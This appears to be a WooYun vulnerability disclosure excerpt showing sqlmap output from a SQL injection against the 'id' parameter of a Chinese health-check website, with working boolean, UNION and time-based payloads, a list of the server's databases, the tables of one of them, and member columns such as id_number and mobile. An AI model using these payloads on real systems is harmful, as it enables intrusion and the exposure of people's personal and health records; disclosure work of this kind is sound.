WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=mec&id=60 AND 7419=7419
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: act=mec&id=60 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71
6e736171,0x4b4e7379494577565262,0x7170696f71),NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=mec&id=60 AND SLEEP(5)
---
[12:48:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11

available databases [19]:
[*] 114_jiankang_cn
[*] bak_hzhailiao_com
[*] bak_hzhailiao_jiankang_cn
[*] bak_icare_jiankang_cn
[*] book_jiankang_cn
[*] bs_tjxt_scfb
[*] cn_jiankang
[*] equipments
[*] hzhailiao_com
[*] hzhailiao_jiankang_cn
[*] hzhailiao_jiankang_cn_bak
[*] hzlyy_com
[*] icare_jiankang_cn
[*] information_schema
[*] lyy_jiankang_cn
[*] mysql
[*] report_hzhailiao
[*] yls0804
[*] ylscn_jiankang

Database: hzlyy_com
[64 tables]
+--------------------------+
| ---check_to expert       |
| ---member_info2          |
| member_info2012-10-12    |
| tj_tjdjb2012-10-12       |
| announcement             |
| check_category           |
| check_category_items     |
| check_items              |
| check_reserve_days       |
| check_yuyue              |
| check_yuyue_items        |
| company                  |
| company_check_category   |
| company_department       |
| company_personnel        |
| company_personnel_cancel |
| feedback                 |
| goods                    |
| goods_cart               |
| goods_order              |
| goods_order_as           |
| header                   |
| meal                     |
| member                   |
| member_email_auth        |
| member_forget            |
| member_info              |
| member_login_change      |
| member_login_log         |
| member_mobile_auth       |
| member_passwd_change     |
| member_to_check          |
| member_to_device         |
| member_to_groups         |
| member_to_tags           |
| message                  |
| message_as               |
| message_old              |
| minfo_func               |
| minfo_groups             |
| minfo_groups_func        |
| minfo_priv               |
| minfo_to_groups          |
| mobile_sms               |
| mobile_sms_mass          |
| music                    |
| sports                   |
| tags                     |
| task                     |
| tj_gzry                  |
| tj_hydwdmb               |
| tj_hydwdmb_20120725      |
| tj_personnel             |
| tj_personnel_tjbh        |
| tj_sequences             |
| tj_tjdjb                 |
| tj_tjjlb                 |
| tj_tjjlmxb               |
| tj_tjxmb                 |
| tj_zhxm_hd               |
| vip_card                 |
| vip_card_consumption     |
| weight_foods             |
| weight_sports_days       |
+--------------------------+

addres
s, allowance, belong_uid, birthday, category, city, company, company_department_
name, company_id, email, email_flag, expert_id, expert_name, face, hastype, heig
ht, id, id_number, intro, marry, message_new, mobile, mobile_flag, mobile_remind
, money, name, post, province, remark, runstridelength, sex, stridelength, type,
 uid, weight, xdview_flag